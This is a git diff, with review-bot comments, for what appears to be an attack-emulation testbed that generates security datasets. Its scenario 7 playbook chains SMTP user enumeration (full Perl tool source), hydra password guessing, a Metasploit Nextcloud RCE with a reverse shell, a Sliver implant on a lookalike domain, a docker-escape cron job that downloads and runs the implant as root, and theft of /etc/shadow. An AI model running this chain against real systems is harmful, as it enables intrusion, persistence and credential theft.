diff --git a/ansible/ansible.cfg b/ansible/ansible.cfg index e9c38d2a..4467753c 100644 --- a/ansible/ansible.cfg +++ b/ansible/ansible.cfg @@ -102,7 +102,7 @@ roles_path = $LOCAL_PACKAGE_ANSIBLE_PATH/roles #sudo_flags = -H -S -n # SSH timeout -#timeout = 10 +timeout = 30 # default user to use for playbooks if user is not specified # (/usr/bin/ansible will use current user as default) diff --git a/ansible/deploy/attacker/sliver.yml b/ansible/deploy/attacker/sliver.yml new file mode 100644 index 00000000..430fe15e --- /dev/null +++ b/ansible/deploy/attacker/sliver.yml @@ -0,0 +1,7 @@ +- name: Install Attacker Host + become: true + hosts: 10.110.0.211 + roles: + - role: sliver + vars: + sliver_user: ubuntu diff --git a/ansible/run/scenario7/files/smtp-pass.txt b/ansible/run/scenario7/files/smtp-pass.txt new file mode 100644 index 00000000..d84486e6 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-pass.txt @@ -0,0 +1,100 @@ +windows2000 14:18:03 [1906/1906] +3830182 +tristan01 +964123 +chrisp +0825 +445566a +witchy +thickness +020181 +polk +sexyback12 +ihateyou9 +nate01 +vivayo +alex1972 +mimi88 +JENNY +01071975 +235 +akoako +zztop +courtney22 +01011959 +punk14 +loser17 +applejack1 +18111976 +spencer13 +841015 +meeko +becca2 +rockhopper +skyliner33 +amanda86 +071198 +iloveyou97 +bullshit7 +homie12 +djeter +chick2 +gupta +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +poopdick +200375 +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +alice123alice! +200375 +170876 +richman1 +acuario1 +jayann +30091978 +nguyen4 +COWBOYS +ttt111 +milan7 +loveday +TINKERBELL +utythfk +15011977 +kieran123 +bike4life +3690 +lisa14 +nicolina +duke07 +199308 +internet01 +851210 +usher2 +burnley1 +170376 +akmaral +811023 +charing 
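Review bot: The new sliver.yml play passes `sliver_user: ubuntu` to the `sliver` role, while packer/attacker/playbook/main.yaml in this same commit invokes the same role with `server_user: "{{attacker_user}}"`; the role's defaults are not in the diff, but only one of the two names can be the variable it reads, so the other call site presumably has no effect. Settle on one variable name in both places. The play also targets a literal address, `hosts: 10.110.0.211`, whereas ansible/run/scenario7/main.yml addresses the same machine as `hosts: attacker`; using the inventory group here keeps the play valid when the lab network is renumbered.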
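Review bot: The first line of smtp-pass.txt is `windows2000 14:18:03 [1906/1906]`, which reads as a terminal status fragment pasted in together with the list rather than a wordlist entry, and the run of entries from `cowboy88` through `mcbride` appears twice in the middle of the file. Neither is a real candidate; cut the first line to `windows2000` and drop the duplicate block so the list reflects what the scenario is meant to exercise and the logged attempt count matches it.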
diff --git a/ansible/run/scenario7/files/smtp-user-enum.pl b/ansible/run/scenario7/files/smtp-user-enum.pl
new file mode 100755
index 00000000..5c9e4f3d
--- /dev/null
+++ b/ansible/run/scenario7/files/smtp-user-enum.pl
@@ -0,0 +1,411 @@
+#!/usr/bin/perl -w
+# smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO
+# Copyright (C) 2008 pentestmonkey@pentestmonkey.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 as
+# published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License along
+# with this program; if not, write to the Free Software Foundation, Inc.,
+# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+# This tool may be used for legal purposes only. Users take full responsibility
+# for any actions performed using this tool. If these terms are not acceptable to
+# you, then do not use this tool.
+# +# You are encouraged to send comments, improvements or suggestions to +# me at smtp-user-enum@pentestmonkey.net +# +# This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind ) +# + +use strict; +use Socket; +use IO::Handle; +use IO::Select; +use IO::Socket::INET; +use Getopt::Std; +$| = 1; + +my $VERSION = "1.2"; +my $debug = 0; +my @child_handles = (); +my $verbose = 0; +my $max_procs = 5; +my $smtp_port = 25; +my @usernames = (); +my @hosts = (); +my $recursive_flag = 1; +my $query_timeout = 5; +my $mode = "VRFY"; +my $from_address = 'user@example.com'; +my $start_time = time(); +my $end_time; +my $kill_child_string = "\x00"; +$SIG{CHLD} = 'IGNORE'; # auto-reap +my %opts; +my $usage=<; +} + +if (defined($host_file)) { + open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n"; + @hosts = map { chomp($_); $_ } ; +} + +if (defined($username)) { + push @usernames, $username; +} + +if (defined($host)) { + push @hosts, $host; +} + +if (defined($host_file) and not @hosts) { + print "ERROR: Targets file $host_file was empty\n"; + exit 1; +} + +if (defined($username_file) and not @usernames) { + print "ERROR: Username file $username_file was empty\n"; + exit 1; +} + +print "Starting smtp-user-enum v$VERSION ( http://pentestmonkey.net/tools/smtp-user-enum )\n"; +print "\n"; +print " ----------------------------------------------------------\n"; +print "| Scan Information |\n"; +print " ----------------------------------------------------------\n"; +print "\n"; +print "Mode ..................... $mode\n"; +print "Worker Processes ......... $max_procs\n"; +print "Targets file ............. $host_file\n" if defined($host_file); +print "Usernames file ........... $username_file\n" if defined($username_file); +print "Target count ............. " . scalar(@hosts) . "\n" if @hosts; +print "Username count ........... " . scalar(@usernames) . "\n" if @usernames; +print "Target TCP port .......... 
$smtp_port\n"; +print "Query timeout ............ $query_timeout secs\n"; +print "Target domain ............ $domain\n" if defined($domain); +print "\n"; +print "######## Scan started at " . scalar(localtime()) . " #########\n"; + +# Spawn off correct number of children +foreach my $proc_count (1..$max_procs) { + socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; + $child->autoflush(1); + $parent->autoflush(1); + + # Parent executes this + if (my $pid = fork) { + close $parent; + print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug; + push @child_handles, $child; + + # Child executes this + } else { + close $child; + while (1) { + my $timed_out = 0; + + # Read host and username from parent + my $line = <$parent>; + chomp($line); + my ($host, $username, $domain) = $line =~ /^(\S+)\t(.*)\t(.*)$/; + + # Append domain to username if a domain was supplied + $username = $username . "@" . $domain if (defined($domain) and $domain); + + # Exit if told to by parent + if ($line eq $kill_child_string) { + print "[Child $$] Exiting\n" if $debug; + exit 0; + } + + # Sanity check host and username + if (defined($host) and defined($username)) { + print "[Child $$] Passed host $host and username $username\n" if $debug; + } else { + print "[Child $$] WARNING: Passed garbage. 
Ignoring: $line\n"; + next; + } + + # Do smtp query with timeout + my $response; + eval { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $query_timeout; + my $s = IO::Socket::INET->new( PeerAddr => $host, + PeerPort => $smtp_port, + Proto => 'tcp' + ) + or die "Can't connect to $host:$smtp_port: $!\n"; + my $buffer; + $s->recv($buffer, 10000); # recv banner + if ($mode eq "VRFY") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("VRFY $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "EXPN") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("EXPN $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "RCPT") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("MAIL FROM:$from_address\r\n"); + $s->recv($buffer, 10000); + $s->send("RCPT TO:$username\r\n"); + $s->recv($buffer, 10000); + } else { + print "ERROR: Unknown mode in use\n"; + exit 1; + } + $response .= $buffer; + alarm 0; + }; + +# if ($@) { +# $timed_out = 1; +# print "[Child $$] Timeout for username $username on host $host\n" if $debug; +# } + + my $trace; + if ($debug) { + $trace = "[Child $$] $host: $username "; + } else { + $trace = "$host: $username "; + } + + if ($response and not $timed_out) { + + # Negative result + if ($response =~ /5\d\d \S+/s) { + print $parent $trace . "\n"; + next; + + # Postive result + } elsif ($response =~ /2\d\d \S+/s) { + print $parent $trace . "exists\n"; + next; + + # Unknown response + } else { + $response =~ s/[\n\r]/./g; + print $parent $trace . "$response\n"; + next; + } + } + + if ($timed_out) { + print $parent $trace . "\n"; + } else { + if (!$response) { + print $parent $trace . 
"\n"; + } + } + } + exit; + } +} + +# Fork once more to make a process that will us usernames and hosts +socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; +$get_next_query->autoflush(1); +$parent->autoflush(1); + +# Parent executes this +if (my $pid = fork) { + close $parent; + +# Chile executes this +} else { + # Generate queries from username-host pairs and send to parent + foreach my $username (@usernames) { + foreach my $host (@hosts) { + my $query = $host . "\t" . $username . "\t" . $domain; + print "[Query Generator] Sending $query to parent\n" if $debug; + print $parent "$query\n"; + } + } + + exit 0; +} + +printf "Created %d child processes\n", scalar(@child_handles) if $debug; +my $s = IO::Select->new(); +my $s_in = IO::Select->new(); +$s->add(@child_handles); +$s_in->add(\*STDIN); +my $timeout = 0; # non-blocking +my $more_queries = 1; +my $outstanding_queries = 0; +my $query_count = 0; +my $result_count = 0; + +# Write to each child process once +writeloop: foreach my $write_handle (@child_handles) { + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $write_handle "$query\n"; + $outstanding_queries++; + } else { + print "[Parent] Quitting main loop. All queries have been read.\n" if $debug; + last writeloop; + } +} + +# Keep reading from child processes until there are no more queries left +# Write to a child only after it has been read from +mainloop: while (1) { + # Wait until there's a child that we can either read from or written to. + my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking + + print "[Parent] There are " . scalar(@$rh_aref) . 
" children that can be read from\n" if $debug; + + foreach my $read_handle (@$rh_aref) { + # Read from child + chomp(my $line = <$read_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + $outstanding_queries--; + $query_count++; + + # Write to child + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $read_handle "$query\n"; + $outstanding_queries++; + } else { + print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug; + last mainloop; + } + } +} + +# Wait to get replies back from remaining children +my $count = 0; +readloop: while ($outstanding_queries) { + my @ready_to_read = $s->can_read(1); # blocking + foreach my $child_handle (@ready_to_read) { + print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug; + chomp(my $line = <$child_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + print $child_handle "$kill_child_string\n"; + $s->remove($child_handle); + $outstanding_queries--; + $query_count++; + } +} + +# Tell any remaining children to exit +foreach my $handle ($s->handles) { + print "[Parent] Telling child to exit\n" if $debug; + print $handle "$kill_child_string\n"; +} + +# Wait for all children to terminate +while(wait != -1) {}; + +print "######## Scan completed at " . scalar(localtime()) . 
" #########\n"; +print "$result_count results.\n"; +print "\n"; +$end_time = time(); # Second granularity only to avoid depending on hires time module +my $run_time = $end_time - $start_time; +$run_time = 1 if $run_time < 1; # Avoid divide by zero +printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time; diff --git a/ansible/run/scenario7/files/smtp-user.txt b/ansible/run/scenario7/files/smtp-user.txt new file mode 100644 index 00000000..573755f5 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-user.txt @@ -0,0 +1,21 @@ +david@attackbed.com +alex@attackbed.com +maria@attackbed.com +john@attackbed.com +marco@attackbed.com +andrea@attackbed.com +peter@attackbed.com +daniel@attackbed.com +cathy@attackbed.com +antonio@attackbed.com +bob@attackbed.com +roberta@attackbed.com +cedric@attackbed.com +cynthia@attackbed.com +paul@attackbed.com +alice@attackbed.com +dora@attackbed.com +admin@attackbed.com +james@attackbed.com +sales@attackbed.com +office@attackbed.com diff --git a/ansible/run/scenario7/gather.yml b/ansible/run/scenario7/gather.yml new file mode 100644 index 00000000..3c192522 --- /dev/null +++ b/ansible/run/scenario7/gather.yml 
@@ -0,0 +1,85 @@ +- hosts: inetfw + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_configs: + - src: /var/lib/suricata + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/ossec.conf + + kyoushi_gather_logs: + - src: /var/log + recursive: true + + +- hosts: docker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /opt/nextcloud/log + - /var/lib/docker/containers + recursive: true + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /opt/nextcloud + recursive: true + exclude: + - "/opt/nextcloud/dump.sql" + - "/opt/nextcloud/log" + - src: /var/ossec/etc/ossec.conf + + +- hosts: attacker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /home/aecid/attackmate.log + - /home/aecid/output.log + - /home/aecid/attackmate.json + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /home/aecid/scenario*.yml + - src: /var/www/html + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + +- hosts: wazuh + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - src: /var/ossec/logs/alerts + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/shared + recursive: true diff --git a/ansible/run/scenario7/main.yml b/ansible/run/scenario7/main.yml new file mode 100644 index 00000000..6cfb5eb0 --- /dev/null +++ b/ansible/run/scenario7/main.yml 
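Review bot: Every `exclude` entry carries a trailing space inside the quotes, `"/etc/runit "` and `"/etc/sv "`, in all four plays, so unless the kyoushi-gather role trims its input the exclusions will not match `/etc/runit` and `/etc/sv` and those trees are collected anyway; they should read `- "/etc/runit"` and `- "/etc/sv"`. In the `docker` and `attacker` plays the log lists also mix bare strings (`- /opt/nextcloud/log`, `- /var/lib/docker/containers`, `- /home/aecid/attackmate.log`) with `src:` mappings, and the `recursive: true` that follows the bare `/var/lib/docker/containers` item cannot attach to a scalar; writing every entry as `- src: PATH` makes the lists consistent with the `configs` lists in the same file. Indentation is not recoverable from this rendering, so the exact nesting is inferred.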
@@ -0,0 +1,135 @@ + +- name: Retstart dnsmasq on inetdns + hosts: inetdns + become: true + tasks: + - name: stop dnsmasq + ansible.builtin.service: + name: dnsmasq + state: stopped + tags: + - playbooks + + - name: Configure public DNS + ansible.builtin.copy: + content: "address=/faaacebook.com/192.42.1.174\n" + owner: root + dest: /etc/dnsmasq.d/attacker.conf + # delegate_to: inetdns + tags: + - playbooks + + - name: start dnsmasq + ansible.builtin.service: + name: dnsmasq + state: started + tags: + - playbooks + +- name: Install Attacker Host + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + tasks: + - name: get user home directory + ansible.builtin.shell: > + getent passwd {{ attacker_user }} | awk -F: '{ print $6 }' + changed_when: false + register: user_home + tags: + - metasploit + - exploit + - config + - install + - git + - attackmate + - playbooks + + - name: Ensure delay before commands + ansible.builtin.replace: + path: /etc/attackmate.yml + regexp: 'command_delay: 0' + replace: 'command_delay: 15' + backup: yes + become: true + tags: + - playbooks + + +- name: Install Attacker Host Part 2 + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + # delay_before_attack: 600 + delay_before_attack: 0 + tasks: + - name: Install docker.io + apt: + name: docker.io + state: present + tags: + - playbooks + + - name: Copy smtp-enum + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user-enum.pl" + dest: "{{user_home.stdout}}/smtp-user-enum.pl" + mode: '0755' + tags: + - playbooks + + - name: Copy smtp-user-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user.txt" + dest: "{{user_home.stdout}}/smtp-user.txt" + mode: '0744' + tags: + - playbooks + + - name: Copy smtp-pass-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-pass.txt" + dest: 
"{{user_home.stdout}}/smtp-pass.txt" + mode: '0744' + tags: + - playbooks + + + - name: Copy playbooks + become: True + become_user: "{{attacker_user}}" + ansible.builtin.template: + src: "{{ item }}.j2" + dest: "{{user_home.stdout}}/{{ item }}.yml" + mode: '0755' + loop: + - scenario_7 + tags: + - metasploit + - attackmate + - exploit + - config + - install + - playbooks + + - name: "Run Scenario 7" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux \"--json\" scenario_7.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_7 + - metasploit + - attackmate + - exploit diff --git a/ansible/run/scenario7/templates/scenario_7.j2 b/ansible/run/scenario7/templates/scenario_7.j2 new file mode 100755 index 00000000..724a756f --- /dev/null +++ b/ansible/run/scenario7/templates/scenario_7.j2 
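Review bot: The wordlist copies set `mode: '0744'` and the rendered scenario playbook `mode: '0755'`, which mark plain text and YAML files executable for no reason; `mode: '0644'` is sufficient since both are consumed by path. The play name `Retstart dnsmasq on inetdns` has a typo (`Restart`). The `get user home directory` task shells out to `getent passwd ... | awk`; `ansible.builtin.getent` with `database: passwd` and `key: "{{ attacker_user }}"` exposes the same field as `getent_passwd[attacker_user][4]` without a shell pipeline. The registered `user_home` is set in one play and read in the next (`Install Attacker Host Part 2`), which works because registered variables persist per host, but a one-line comment on the second play saying so would spare the next reader a search.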
@@ -0,0 +1,186 @@ +#################### +# +# Scenario 7 +# +#################### +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + DOMAIN: attackbed.com + PAYLOAD_DOCKER: cmd/linux/http/x64/meterpreter/reverse_tcp + +commands: + - type: shell + cmd: ./smtp-user-enum.pl -M VRFY -U smtp-user.txt -t $SERVER_ADDRESS + metadata: + techniques: "T1589.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Identity Information: Email Addresses" + description: "Enumerate email addresses on SMTP-Host" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: hydra -l "alice@$DOMAIN" -P smtp-pass.txt -c 5 -s 143 $SERVER_ADDRESS imap + metadata: + techniques: "T1078.002,T1110.001,T1133" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts, Brute Force: Password Guessing, External Remote Services" + description: "Brute-force IMAP-password using the already enumerated username" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: http-client + url: http://$SERVER_ADDRESS:8080 + metadata: + techniques: "T1592.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Host Information: Software" + description: "Attacker connects to webport to find out about nextcloud" + + - type: sliver + cmd: "generate_implant" + c2url: "https://faaacebook.com" + name: "badimplant" + metadata: + description: "Generate implant for the persistence on the container-host" + + - type: sliver + cmd: start_https_listener + host: 0.0.0.0 + port: 443 + metadata: + techniques: "T1071.001,T1573.001" + tactics: "Command and Control" + technique_name: "Application Layer Protocol: Web Protocols,Encrypted Channel: Symmetric Cryptography" + description: "Start a listener for the sliver implant" + + - type: webserv + local_path: $LAST_SLIVER_IMPLANT + port: 8888 + background: True + kill_on_exit: true + metadata: + description: "Serve the sliver implant for installation" + + - type: msf-module + cmd: 
exploit/unix/webapp/nextcloud_workflows_rce + creates_session: "foothold" + options: + RHOSTS: "$SERVER_ADDRESS" + RPORT: "8080" + USERNAME: "alice" + PASSWORD: "alice123alice!" + WfsDelay: "8000" + payload_options: + LHOST: "192.42.1.174" + LPORT: "4444" + payload: "cmd/linux/http/x64/meterpreter/reverse_tcp" + metadata: + tactics: "Initial Access, Execution,Command and Control" + techniques: "T1190,T1059.004,T1095" + description: "Attacker exploits an authenticated vulnerability in nextcloud and executes a meterpreter shell" + + + - type: msf-session + session: "foothold" + stdapi: True + cmd: getuid + metadata: + techniques: "T1033" + tactics: "Discovery" + description: "Attacker discovers user id" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: msf-session + session: "foothold" + stdapi: True + cmd: portfwd add -l 1090 -p 2375 -r 172.18.0.1 + metadata: + description: "Attacker starts port-forwarding for further attacks on the exposed docker-daemon" + + - type: shell + cmd: docker -H tcp://localhost:1090 ps + metadata: + techniques: "T1057" + tactics: "Discovery" + description: "Attacker asks docker-daemon for running containers" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + + - type: shell + cmd: docker -H tcp://localhost:1090 network list + metadata: + techniques: "T1016 " + tactics: "Discovery" + description: "Attacker discovers docker-networks using the exposed docker-daemon" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: docker -H tcp://localhost:1090 run --rm -t -u root --network=nextcloud_default -v /etc:/root/etc kalilinux/kali-rolling bash -c "echo \"*/5 * * * * root test -e /opt/tool || curl http://$ATTACKER_ADDRESS:8888/tool > /opt/tool && chmod +x /opt/tool && /opt/tool\" > /root/etc/cron.d/sysvz" + metadata: + techniques: "T1610,T1525,T1053.003" + tactics: "Defense Evasion,Execution,Persistence,Privilege Escalation" + description: "Attacker mounts etc-directory of the 
host into a container and creates a cron-job in it that executes the sliver-implant as root outside of the container" + + + - type: sliver-session + cmd: ls + remote_path: "." + session: badimplant + metadata: + techniques: "T1083" + tactics: "Discovery" + technique_name: "File and Directory Discovery" + description: "Use sliver to list files after container-escape" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: ps + session: badimplant + metadata: + techniques: "T1057" + tactics: "Discovery" + technique_name: "Process Discovery" + description: "Use sliver to list processes after container-escape" + + - type: mktemp + variable: SHADOW + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: download + remote_path: /etc/shadow + local_path: $SHADOW + session: badimplant + metadata: + techniques: "T1003.008,T1041" + tactics: "Credential Access,Collection,Exfiltration" + technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow,Exfiltration Over C2 Channel" + description: "Use sliver to dump /etc/shadow credentials" diff --git a/packer/attacker/playbook/main.yaml b/packer/attacker/playbook/main.yaml index 7cabf828..79964b08 100644 --- a/packer/attacker/playbook/main.yaml +++ b/packer/attacker/playbook/main.yaml @@ -56,13 +56,9 @@ vars: aecidtools_user: "{{attacker_user}}" - role: postexploit - - role: l50.sliver + - role: sliver vars: - server_path: "/home/{{attacker_user}}/sliver-server" - client_path: /usr/local/bin/sliver - sliver_service_path: /etc/systemd/system/sliver.service - sliver_client_config_path: "/home/{{attacker_user}}/.sliver-client/configs" - setup_systemd: true + server_user: "{{attacker_user}}" - role: metasploit vars: metasploit_user: "{{attacker_user}}" 
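Review bot: The msf-module step hard-codes `LHOST: "192.42.1.174"` and `payload: "cmd/linux/http/x64/meterpreter/reverse_tcp"` even though the header declares `$ATTACKER_ADDRESS` with that address and `PAYLOAD_DOCKER` with that payload, and `PAYLOAD_DOCKER` is the only entry in `vars` without the `$` prefix the other two use, so it is presumably never substituted anywhere. Use `LHOST: "$ATTACKER_ADDRESS"`, rename the variable to `$PAYLOAD_DOCKER` and reference it as `payload: "$PAYLOAD_DOCKER"` (assuming attackmate expands variables in that field as it visibly does for `RHOSTS`), so the attacker address lives in one place. The `techniques: "T1016 "` value on the docker network step has a trailing space that will leak into the recorded metadata. The file is a `.j2` template but contains no Jinja expressions, so the `template` task currently behaves as a plain copy.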
@@ -71,6 +67,7 @@ metasploit_rpcpassword: hackerman
 - role: attackmate
 vars:
+ attackmate_version: development
 attackmate_msf_server: "localhost"
 attackmate_msf_passwd: "hackerman"
 attackmate_sliver_config: "/home/aecid/.sliver-client/configs/aecid_localhost.cfg"
@@ -96,4 +93,4 @@ ansible.builtin.lineinfile:
 path: /etc/resolv.conf
 regexp: '^nameserver 8\.8\.8\.8$'
- state: absent
\ No newline at end of file
+ state: absent
diff --git a/packer/attacker/playbook/requirements.yml b/packer/attacker/playbook/requirements.yml
index 000d07bb..9c47fc34 100644
--- a/packer/attacker/playbook/requirements.yml
+++ b/packer/attacker/playbook/requirements.yml
@@ -8,8 +8,9 @@ roles:
 - src: https://github.com/ait-testbed/atb-ansible-postexploit.git
 version: v1.2.3
 name: postexploit
- - name: l50.sliver
- version: v1.0.1
+ - name: sliver
+ version: v0.1.0
+ src: https://github.com/ait-testbed/atb-ansible-sliver.git
 - src: https://github.com/ait-testbed/atb-ansible-aeciduser.git
 version: v1.0.0
 name: aeciduser
@@ -20,7 +21,7 @@ roles:
 version: v0.0.1
 name: seclists
 - src: https://github.com/ait-testbed/attackmate-ansible.git
- version: v1.2.0
+ version: v1.4.0
 name: attackmate
 - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git
 version: v1.0.0
diff --git a/packer/docker/playbook/main.yaml b/packer/docker/playbook/main.yaml
index e01a7427..5a967bbc 100644
--- a/packer/docker/playbook/main.yaml
+++ b/packer/docker/playbook/main.yaml
@@ -16,7 +16,7 @@ - role: nextcloudrce
 vars:
 nextcloud_rce_start_container: false #Needed to prevent the start of containers at atb-ansible-nextcloudrce role before mail feature
- nextcloud_rce_domain: "localhost:8080"
+ nextcloud_rce_domain: "192.42.0.254:8080"
 nextcloud_mail_image: "ghcr.io/ait-testbed/attackbed/nextcloud-mail:1.0.0"
 nextcloud_rce_docker_compose_template: "docker-compose-mail.yml.j2"
 - role: vulndockerd
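Review bot: `attackmate_version: development` points the attackmate role at a moving target rather than a release, so the attacker image built by packer is no longer reproducible and can differ between two builds of the same commit, even though the role itself is pinned to `v1.4.0` in requirements.yml. If unreleased features are required (the `sliver` and `webserv` step types used in scenario_7.j2 suggest this), pin a tag or commit instead, e.g. `attackmate_version: <tag-or-commit>` (placeholder), and record why in a comment. How the role resolves this value is not visible in the diff.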
diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml
index c14a299c..290f2d0f 100644
--- a/packer/firewall/playbook/main.yaml
+++ b/packer/firewall/playbook/main.yaml
@@ -116,6 +116,8 @@ rules:
 - Cloud Ports
 - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 8080 }
+ - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 25 }
+ - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 143 }
 - Videoserver Ports
 - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER", proto: tcp, dest_port: 80 }
 - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER:22", proto: tcp, dest_port: 2222 }
diff --git a/terragrunt/attacker/terragrunt.hcl b/terragrunt/attacker/terragrunt.hcl
index e8a84350..47a2c5c2 100644
--- a/terragrunt/attacker/terragrunt.hcl
+++ b/terragrunt/attacker/terragrunt.hcl
@@ -14,5 +14,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf
index 6aa02a5c..595bd3fd 100644
--- a/terragrunt/bootstrap/module/main.tf
+++ b/terragrunt/bootstrap/module/main.tf
@@ -6,6 +6,7 @@ locals {
 ext_dns_userdata_file = var.ext_dns_userdata == null ? "${path.module}/scripts/dns.yml" : var.ext_dns_userdata
 fw_userdata_file = var.fw_userdata == null ? "${path.module}/scripts/firewallinit.yml" : var.fw_userdata
 mgmt_userdata_file = var.mgmt_userdata == null ? "${path.module}/scripts/mgmtinit.yml" : var.mgmt_userdata
+ ext_dnsserver_userdata_file = var.corpdns_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.corpdns_userdata
 }
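Review bot: The two new DNAT rules forward TCP 25 and 143 from `inet` to the cloud host with nothing recording why; unlike the existing 8080 rule these expose plaintext mail protocols, and a reader of the firewall playbook cannot tell whether that is deliberate for scenario 7 or an accident. A one-line comment above them, `# scenario 7: SMTP (25) and IMAP (143) on the cloud host are reachable from inet by design`, would make the intent explicit and keep a later cleanup from removing them.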
@@ -356,10 +357,6 @@ resource "openstack_networking_floatingip_associate_v2" "mgmt" {
 }
-locals {
- ext_dnsserver_userdata_file = var.dnsserver_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.dnsserver_userdata
-}
-
 ####################################################################
 #
 # CREATE INSTANCE for "DNS-Server"
@@ -381,13 +378,13 @@ data "template_cloudinit_config" "cloudinitdnsserver" {
 }
 data "openstack_images_image_v2" "dnsserver-image" {
- name = var.dnsserver_image
+ name = var.corpdns_image
 most_recent = true
 }
 resource "openstack_compute_instance_v2" "dnsserver" {
 name = "corpdns"
- flavor_name = var.dnsserver_flavor
+ flavor_name = var.corpdns_flavor
 key_pair = var.sshkey
 image_id = data.openstack_images_image_v2.dnsserver-image.id
 user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered
@@ -401,4 +398,4 @@ resource "openstack_compute_instance_v2" "dnsserver" {
 depends_on = [
 openstack_networking_network_v2.internet,
 ]
-}
\ No newline at end of file
+}
diff --git a/terragrunt/bootstrap/module/variables.tf b/terragrunt/bootstrap/module/variables.tf
index 08fdcf17..70d8eeff 100644
--- a/terragrunt/bootstrap/module/variables.tf
+++ b/terragrunt/bootstrap/module/variables.tf
@@ -64,20 +64,20 @@ variable "mgmt_flavor" {
 default = "d2-2"
 }
-variable "dnsserver_image" {
+variable "corpdns_image" {
 type = string
